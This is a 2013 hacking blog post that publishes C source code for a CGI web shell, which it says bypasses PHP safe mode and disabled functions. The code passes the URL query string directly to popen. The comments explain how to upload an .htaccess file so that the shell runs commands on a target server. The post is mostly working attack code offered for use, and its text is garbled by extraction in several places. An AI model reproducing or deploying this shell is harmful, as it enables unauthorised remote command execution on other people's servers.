Hackers2DevNull

Hackers2DevNull

Saturday 18 May 2013

CGI-C Shell - PHP disabled functions/Safe Mode Bypass Shell source [Windows/Linux]




When Safe mode is on it can be a pain to do what you want to do on the system. Being able to access CGI solves this problem, and here is my implementation of a shell (safe mode bypass) in C for windows and linux.


// (If you find this useful, why not checkout a advert below to support the blog? :O ) ~r0ng






The code:



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>


//CGI-C Shell - Safe mode bypass ~ r0ng ~ hackers2devnull.blogspot.co.uk
//Upload a .htaccess file with:
//  Options +ExecCGI
//  AddHandler cgi-script cgi
//Then usage is target.com/shell.cgi?[command]
//Compatible with Windows and linux
 


int mainvoid )

{

    
char *env getenv("QUERY_STRING");


    
char pStream[128];


    
FILE  *pPipe;


    
urlStrip(env);

    
printf("Content-type: text/html\n\n\n");



    
#if defined (WIN32) || defined (_WIN32) || defined (__WIN32__) || defined (__NT__) || defined (WIN64) || defined (_WIN64) || defined (__WIN64__)


    
pPipe _popenenv"r" );


    
#else


    
pPipe popenenv"r" );


    
#endif



    
while( !feofpPipe ) )


    {
      
        if( 
fgetspStream128pPipe ) != NULL )

        
printf"<pre>%s"pStream );
     
    }


}
int urlStrip(char *str)

{

    
unsigned int i;

    
char url[BUFSIZ];

    
char *ptr url;

    
memset(url0sizeof(url));



    for (
i=0strlen(str); i++)

    {

        if (
str[i] != '%')

        {

            *
ptr++ = str[i];

            continue;

        }



        if (!
isdigit(str[i+1]) || !isdigit(str[i+2]))

        {

            *
ptr++ = str[i];

            continue;

        }



        *
ptr++ = ((str[i+1] - '0') << 4) | (str[i+2] - '0');

        
+= 2;

    }

    *
ptr '\0';

    
strcpy(strurl);

    return 
0
;}

No comments:

Post a Comment